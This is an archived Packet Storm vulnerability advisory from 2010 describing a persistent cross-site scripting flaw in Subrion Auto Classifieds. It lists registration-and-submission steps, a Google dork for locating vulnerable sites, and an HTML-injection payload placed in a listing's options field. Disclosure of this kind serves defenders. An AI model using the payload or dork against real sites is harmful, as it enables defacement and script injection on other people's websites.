what you don't know can hurt you

Subrion Auto Classifieds Cross Site Scripting

Subrion Auto Classifieds Cross Site Scripting
Posted Jul 18, 2010
Authored by Sid3 effects

Subrion Auto Classifieds suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 0fd231a60ffcc6abf87d4c47851bc555

Subrion Auto Classifieds Cross Site Scripting

Change Mirror Download
Name :Subrion Auto Classifieds Persistent Xss Vulnerability
Date : july 17,2010
Critical Level : HIGH
vendor URL :http://www.subrion.com/product/autos.html
google dork:© 2010 Powered by Subrion CMS
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,SeeMe,RoadKiller
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
Subrion Auto Classifieds is a powerful, highly customizable classifieds script for auto sales sites. It is written in PHP with MySQL. Due to its easy manageable administrator Web interface and its great amount of features it is an excellent choice if you need a cars classifieds portal or an auto auction site.
#######################################################################################################
Xploit:Persistent Xss Vulnerability

Step 1 : Register

Step 2 : Submit your auto.

DEMO URL :http://autos.site.com/autos/submit.php

Step 3 : The attacker can insert their xss scripts in the options.

Attack Pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>

Step 4 : Now check your automobile :)

DEMO URL :http://autos.site.com/autos/account-autos.html

My demo :http://autos.site.com/autos/Acura/MDX/Acura-MDX-marquee-h1-XSS3d-By-Sid3-effects-h1-marqu-a6.html
#######################################################################################################
# 0day no more
# Sid3^effects

Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close